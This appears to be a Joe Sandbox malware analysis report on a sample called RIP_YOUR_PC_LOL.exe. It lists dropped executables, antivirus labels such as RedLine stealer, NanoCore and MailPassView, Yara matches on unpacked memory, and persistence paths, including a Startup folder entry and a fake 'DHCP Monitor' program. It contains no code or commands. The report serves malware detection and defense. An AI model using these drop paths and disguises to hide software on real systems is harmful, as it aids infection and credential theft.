Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Opus.exe, ProcessId: 3244, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat


AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\Opus.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeAvira: detection malicious, Label: TR/Dropper.GR
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeAvira: detection malicious, Label: TR/Agent.aagt
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.cjshc
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.rrsdk
                    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
                    Source: C:\Windows\Help\active_desktop_render.dllAvira: detection malicious, Label: HEUR/AGEN.1245024
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Roaming\gay.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\22.exeAvira: detection malicious, Label: HEUR/AGEN.1227810
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeAvira: detection malicious, Label: TR/AD.MExecute.lzrac
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeAvira: detection malicious, Label: SPR/Tool.MailPassView.473
                    Source: C:\Windows\Cursors\WUDFhosts.exeAvira: detection malicious, Label: HEUR/AGEN.1213003
                    Source: C:\Users\user\AppData\Roaming\a.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.cjshc
                    Source: C:\Users\user\AppData\Roaming\3.exeAvira: detection malicious, Label: HEUR/AGEN.1203070
                    Source: C:\Users\user\AppData\Roaming\test.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Roaming\aaa.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: Yara match, File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
Source: Yara match, File source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 0000001C.00000000.461250332.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000002.674377761.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000024.00000002.673042782.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: Opus.exe PID: 3244, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Opus.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
Source: RIP_YOUR_PC_LOL.exe, Virustotal: Detection: 63%
Source: RIP_YOUR_PC_LOL.exe, Metadefender: Detection: 33%
Source: RIP_YOUR_PC_LOL.exe, ReversingLabs: Detection: 73%
Source: Yara match, File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
Source: Yara match, File source: 4.2.healastounding.exe.34865dc.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.gay.exe.d0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.gay.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1d1caed.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.7.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.mediaget.exe.ab0000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.13.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.RIP_YOUR_PC_LOL.exe.5707591.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 17.0.mediaget.exe.ab0000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.gay.exe.d0000.3.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.RIP_YOUR_PC_LOL.exe.5725596.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.449565052.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match, File source: 0000002A.00000000.507357595.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 0000003B.00000000.627731740.00000000007A2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 0000002E.00000000.548907669.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 0000002E.00000002.610238464.0000000000722000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 0000002A.00000002.552899490.0000000000FB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.410285813.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.408615715.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.409570794.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.679442760.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: gay.exe PID: 1104, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: mediaget.exe PID: 4688, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\gay.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\mediaget.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: RIP_YOUR_PC_LOL.exe, Avira: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Metadefender: Detection: 85%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe, Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe, ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe, Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe, ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\22.exe, Metadefender: Detection: 38%
Source: C:\Users\user\AppData\Roaming\22.exe, ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Roaming\3.exe, Metadefender: Detection: 47%
Source: C:\Users\user\AppData\Roaming\3.exe, ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Roaming\4.exe, ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe, Metadefender: Detection: 26%
Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe, ReversingLabs: Detection: 85%
Source: RIP_YOUR_PC_LOL.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Opus.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\mediaget.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\___11.19.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\healastounding.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\4.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Joe Sandbox ML: detected
Source: C:\Windows\Help\active_desktop_render.dll, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gay.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\22.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Joe Sandbox ML: detected
Source: C:\Windows\Cursors\WUDFhosts.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\a.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\3.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\test.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\aaa.exe, Joe Sandbox ML: detected
Source: 9.2.Opus.exe.840000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.4.unpack, Avira: Label: TR/Dropper.Gen
Source: 4.0.healastounding.exe.900000.4.unpack, Avira: Label: TR/AD.RedLineSteal.cjshc
Source: 4.0.healastounding.exe.900000.4.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 9.0.Opus.exe.840000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Avira: Label: SPR/Tool.MailPassView.473
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.2.unpack, Avira: Label: TR/Dropper.Gen
Source: 12.2.aaa.exe.2c0000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen
Source: 8.0.gay.exe.d0000.2.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 12.0.aaa.exe.2c0000.2.unpack, Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.3.RIP_YOUR_PC_LOL.exe.57b3478.6.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.5755c99.18.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.22.exe.457136.14.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.3.unpack, Avira: Label: TR/Dropper.Gen
Source: 6.2.test.exe.da0000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 8.2.gay.exe.d0000.0.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 12.0.aaa.exe.2c0000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen
Source: 4.2.healastounding.exe.900000.0.unpack, Avira: Label: TR/AD.RedLineSteal.cjshc
Source: 4.2.healastounding.exe.900000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.1.unpack, Avira: Label: TR/Dropper.Gen
Source: 4.0.healastounding.exe.900000.0.unpack, Avira: Label: TR/AD.RedLineSteal.cjshc
Source: 4.0.healastounding.exe.900000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.6.unpack, Avira: Label: TR/Dropper.Gen
Source: 9.2.Opus.exe.5b00000.7.unpack, Avira: Label: TR/NanoCore.fadte
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.5.unpack, Avira: Label: TR/Dropper.Gen
Source: 11.0.22.exe.457136.21.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.1.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.400000.9.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.test.exe.da0000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 17.0.mediaget.exe.ab0000.3.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.d587a1.7.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 17.0.mediaget.exe.ab0000.0.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 11.0.22.exe.457136.9.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 9.0.Opus.exe.840000.3.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.4bdf52.8.unpack, Avira: Label: TR/Dropper.Gen
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.10.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, Avira: Label: TR/Inject.vcoldi
Source: 17.2.mediaget.exe.ab0000.0.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 14.0.8f1c8b40c7be588389a8d382040b23bb.exe.476f20.7.unpack, Avira: Label: TR/Dropper.Gen
Source: 9.0.Opus.exe.840000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 8.0.gay.exe.d0000.1.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 8.0.gay.exe.d0000.0.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 11.0.22.exe.457136.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.healastounding.exe.4582ffa.11.unpack, Avira: Label: TR/Dropper.Gen
Source: 0.0.RIP_YOUR_PC_LOL.exe.e387f7.8.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.RIP_YOUR_PC_LOL.exe.dda1e2.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.0.aaa.exe.2c0000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen
Source: 0.2.RIP_YOUR_PC_LOL.exe.56d4258.19.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 17.0.mediaget.exe.ab0000.1.unpack, Avira: Label: TR/ATRAPS.Gen
Source: 0.1.RIP_YOUR_PC_LOL.exe.d587a1.5.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.RIP_YOUR_PC_LOL.exe.dda1e2.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.0.healastounding.exe.900000.12.unpack, Avira: Label: TR/AD.RedLineSteal.cjshc
Source: 4.0.healastounding.exe.900000.12.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
Source: 0.3.RIP_YOUR_PC_LOL.exe.5956fd2.3.unpack, Avira: Label: TR/Dropper.Gen
Source: 6.0.test.exe.da0000.2.unpack, Avira: Label: TR/Dropper.Gen
